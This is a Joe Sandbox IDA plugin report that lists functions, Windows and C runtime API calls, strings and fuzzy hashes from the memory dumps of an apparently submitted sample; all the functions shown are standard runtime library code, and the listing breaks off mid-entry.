Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 3814571bf81d8d33e02c15116bae8c519b28195e35b455a05cbc09e31a16bba5
Instruction ID: b60feb03b3a35e576139d7d55cf9df6564a95011f9296173466a486b9c7dedd1
Opcode Fuzzy Hash: 3814571bf81d8d33e02c15116bae8c519b28195e35b455a05cbc09e31a16bba5
Instruction Fuzzy Hash: 2D11E9366187055FDB18AF79C8A16BAB793FF80358B15442EE9868BB40D771B942C740

Function 006DAD80 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006DADD4

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 89340db4eb09a3049ae793eed53745c738a404853688faf863998a8aadf6c10d
Instruction ID: 82ac34b8886732c1dd10aaba072dd92b1c1edf1dbe63b10addb9c0a8537bd18c
Opcode Fuzzy Hash: 89340db4eb09a3049ae793eed53745c738a404853688faf863998a8aadf6c10d
Instruction Fuzzy Hash: 86112972A152069BDB14AB69DC46ABA73EEEF04310B10407FF502D7381EB38ED00D795

Function 006DAF2D Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,006DAD0A,00000000,00000000,?), ref: 006DAF59

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 5dcf82d2055a1af29557e038f6c7400567c9dba8d13c140dbf0f1bb3a106ac05
Instruction ID: 7b170dd2310ece28d86d409bca83efd3683fbdebb5f1094d16dfc51d42e081bb
Opcode Fuzzy Hash: 5dcf82d2055a1af29557e038f6c7400567c9dba8d13c140dbf0f1bb3a106ac05
Instruction Fuzzy Hash: 3101D672E18212AFDB295BA4C945AFE3756DB40354F15446AEC42E7380EB34FE42C692

Function 006DABF3 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660

EnumSystemLocalesW.KERNEL32(006DAC60,00000001,?,?,-00000050,?,006DA74B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 006DAC3D

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 5778490ca37eed73dc67682ac4861f8b96ae24e8e623f2d3b926209ebf6ed2fc
Instruction ID: 4120ba2a8f74350950a6e4cded642c2530a7054fd350b52b5ec9a14c0640bbc0
Opcode Fuzzy Hash: 5778490ca37eed73dc67682ac4861f8b96ae24e8e623f2d3b926209ebf6ed2fc
Instruction Fuzzy Hash: 50F046327043045FCB256F79D881ABB7B93EF80328F05842EF9028B790D6B1AC02C640

Function 006D656D Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006D1D71: EnterCriticalSection.KERNEL32(?,?,006D5A48,?,006EFC98,00000008,006D593A,00000000,00000000,?), ref: 006D1D80

EnumSystemLocalesW.KERNEL32(006D6560,00000001,006EFD18,0000000C,006D5F61,-00000050), ref: 006D65A5

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 96c85eb36c04b2bb2e4e218bebd7e7862ba8ccfa9305fa00b144b878ccf4fb13
Instruction ID: 2123ea8db1d00f266daa8b9d119effc10aa41ff943ac510b37f7760886106bd0
Opcode Fuzzy Hash: 96c85eb36c04b2bb2e4e218bebd7e7862ba8ccfa9305fa00b144b878ccf4fb13
Instruction Fuzzy Hash: 4AF03772A01344EFDB00EF98E842BA977F2EB49720F10416AF411DB2A0CBB59940CF84

Function 006DAD35 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660

EnumSystemLocalesW.KERNEL32(006DAD80,00000001,?,?,?,006DA7A5,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 006DAD6C

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 6b116df292339ffdfbe6b63888f3ecafbf3bd659f97b0cc434be812e90ace0be
Instruction ID: da914a26a3f10a22b71522ec6a8e49ea72219494ee582b81dd8ddfa1ca5538ea
Opcode Fuzzy Hash: 6b116df292339ffdfbe6b63888f3ecafbf3bd659f97b0cc434be812e90ace0be
Instruction Fuzzy Hash: 8EF0E53AB0020557CB04AF79D855AAA7FA7EFC5751B06405AEA068BB90C672D843C790

Function 006D6065 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,006D0AC3,?,20001004,00000000,00000002,?,?,006CF9D1), ref: 006D6099

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2f45936bd01f951b567c8090bcaf22e647420f691c388a1de4857b0ba84b4855
Instruction ID: 6657850972bada0517d87034720965020e554d8f45906836c9f45ef460608133
Opcode Fuzzy Hash: 2f45936bd01f951b567c8090bcaf22e647420f691c388a1de4857b0ba84b4855
Instruction Fuzzy Hash: 1EE04F3290021CBBCF122F60DC04ADE3F57EF44761F044416FD0569321CB729921AAD5

Function 006C9AC7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009BF0), ref: 006C9ACC

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 680d38dff26b1d7d84566a4d9ae3f4d3c5eeb7e43580a26d6e11bc8ea134f0cf
Instruction ID: 1645ff95450b7ef4385ac70a19261d6566b5a74e2c52288a331f948d713839d5
Opcode Fuzzy Hash: 680d38dff26b1d7d84566a4d9ae3f4d3c5eeb7e43580a26d6e11bc8ea134f0cf
Instruction Fuzzy Hash:

Function 006D6C90 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 006D6C90

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 91aae1b1fc72a3d0f9b64af66e22eb3bc3c86e1d419588a6345339848b85048f
Instruction ID: f7135cce7a34c8f8dfa784cfabce51d99c6332aee685bc862b9d5d6f014e8008
Opcode Fuzzy Hash: 91aae1b1fc72a3d0f9b64af66e22eb3bc3c86e1d419588a6345339848b85048f
Instruction Fuzzy Hash: 42A01130202202CBA3008F30AE88A0E3AEAAA0A2C03082028A020C8030EB208080EA00

Function 006C1BA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc4d4afdc598b4e83fbbed18201acfb092fd67b7abed91270afadc9e17c9cbe3
Instruction ID: 665e59763549aec90c5000ac63dab5820b2a457c746a056eec6ff50317d6e3f5
Opcode Fuzzy Hash: fc4d4afdc598b4e83fbbed18201acfb092fd67b7abed91270afadc9e17c9cbe3
Instruction Fuzzy Hash: 9DD0927A641A58AFC310CF49E440D41F7B9FB8D670B158166EA0893B20C331FC11CAE0

Function 006E4142 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(02F005F8,02F005F8,00000000,7FFFFFFF,?,006E412D,02F005F8,02F005F8,00000000,02F005F8,?,?,?,?,02F005F8,00000000), ref: 006E41E8
__alloca_probe_16.LIBCMT ref: 006E42A3
__alloca_probe_16.LIBCMT ref: 006E4332
__freea.LIBCMT ref: 006E437D
__freea.LIBCMT ref: 006E4383
__freea.LIBCMT ref: 006E43B9
__freea.LIBCMT ref: 006E43BF
__freea.LIBCMT ref: 006E43CF

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 3da5b5913a87424e6bcf33e99bff481660df684587e8b615b8a8b2c3037def7f
Instruction ID: 67e2f6273e195eea468e57f86b657494f05805c0a83859fc58e270b2f959a82b
Opcode Fuzzy Hash: 3da5b5913a87424e6bcf33e99bff481660df684587e8b615b8a8b2c3037def7f
Instruction Fuzzy Hash: 6871C1329013859ADF20AEB68C41FFE77ABAF49350F290159F914EB381EF759D0087A4

Function 006D8226 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 006D82AC

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: f554dfed4cc89bd749be7eac31dadc435ba424f0d2cac0941ac8dd753f5d47f1
Instruction ID: 6b363523dc4633402371d2f35a00bd64e81b204f7cd28d4ad2eee28e62d97940
Opcode Fuzzy Hash: f554dfed4cc89bd749be7eac31dadc435ba424f0d2cac0941ac8dd753f5d47f1
Instruction Fuzzy Hash: 03B16632D013969FDB218F68CC85BFE7BA6EF59350F14416AE904AB382DA749D01C7A0

Function 006D49BC Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 006D4ADB
CallUnexpected.LIBVCRUNTIME ref: 006D4D54

Strings

csm, xrefs: 006D4A66
csm, xrefs: 006D49F9
xfn, xrefs: 006D4AD2
csm, xrefs: 006D4B12

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm$xfn
API String ID: 2673424686-305129718
Opcode ID: 1aa397b1bef986af9e65c45b19d4fc95c9b254c090c93ff67894295a17899835
Instruction ID: a033ce138899878234963caf1e0fab75f74c859d8313aee410f07890b9d52334
Opcode Fuzzy Hash: 1aa397b1bef986af9e65c45b19d4fc95c9b254c090c93ff67894295a17899835
Instruction Fuzzy Hash: 85B14471C01219EBCF28DFA4C8819AEBBB6FF14310B14416BE9116B316DB71DE51CBA5

Function 006CAC10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 006CAC47
___except_validate_context_record.LIBVCRUNTIME ref: 006CAC4F
_ValidateLocalCookies.LIBCMT ref: 006CACD8
__IsNonwritableInCurrentImage.LIBCMT ref: 006CAD03
_ValidateLocalCookies.LIBCMT ref: 006CAD58

Strings

csm, xrefs: 006CACED

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 0dbacf6863de2c08953ff49ef7ced63146bcabb064ebec3636938779f03432fe
Instruction ID: 19b2a1f84b8328c17191ec5ebc1fb50a983422959f29f545855829ae820d2cee
Opcode Fuzzy Hash: 0dbacf6863de2c08953ff49ef7ced63146bcabb064ebec3636938779f03432fe
Instruction Fuzzy Hash: 6141A230E0021C9BCF10EFA8C885EAE7BA3EF45318F14815AE8159B352D735AE15CBD6

Function 006E2DAC Relevance: 9.3, APIs: 6, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a531445ac54c1ae80cf6b526e34022b9e4a5960da20ba06fd633c34d033f087b
Instruction ID: 687477f443cda2c1ef3a684553add0255c1ddabca16d3566bedc93ee035329ff
Opcode Fuzzy Hash: a531445ac54c1ae80cf6b526e34022b9e4a5960da20ba06fd633c34d033f087b
Instruction Fuzzy Hash: F8B10170E0139AAFDB11DF5AC895BFD7BB7AF16310F144249E411AB392C7B09A42CB60

Function 006D40DC Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,006D40D3,006CA9DD,006C9C34), ref: 006D40EA
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006D40F8
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006D4111
SetLastError.KERNEL32(00000000,006D40D3,006CA9DD,006C9C34), ref: 006D4163

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 69449f94724db45ad2d8ba12ce1ca990fac870c24a9da5b62d6d560353e63d2a
Instruction ID: a8a41959641f969de0ac97b16e5550582cdad4e6dc1e876967de5bda046e0e9a
Opcode Fuzzy Hash: 69449f94724db45ad2d8ba12ce1ca990fac870c24a9da5b62d6d560353e63d2a
Instruction Fuzzy Hash: 9801D432A0A3165FB7642B74BCC65B72697DB62375B20123FF520A53F2FEA24C41D684

Function 006CF258 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6BA95F62,?,?,00000000,006E56A4,000000FF,?,006CF319,006CF200,?,006CF3B5,00000000), ref: 006CF28D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006CF29F
FreeLibrary.KERNEL32(00000000,?,?,00000000,006E56A4,000000FF,?,006CF319,006CF200,?,006CF3B5,00000000), ref: 006CF2C1

Strings

CorExitProcess, xrefs: 006CF297
mscoree.dll, xrefs: 006CF286

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: dca1e3b166d4bcb833ac2eeacb15dbd2bfe53e3a063bd4eecf7ab0196ba29901
Instruction ID: 31f0ec6dfd76a9be7a3c6e01d40a4ac6a9884729d189ad57deff91857f852d54
Opcode Fuzzy Hash: dca1e3b166d4bcb833ac2eeacb15dbd2bfe53e3a063bd4eecf7ab0196ba29901
Instruction Fuzzy Hash: 5301A236940795ABDB018F80CC45FFEBBBAFB04B15F00062AFC12A62A0DB759900CA80

Function 006C7852 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 006C7859
std::_Lockit::_Lockit.LIBCPMT ref: 006C7864
std::_Lockit::~_Lockit.LIBCPMT ref: 006C78D2

Part of subcall function 006C774F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 006C7767

std::locale::_Setgloballocale.LIBCPMT ref: 006C787F
_Yarn.LIBCPMT ref: 006C7895

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
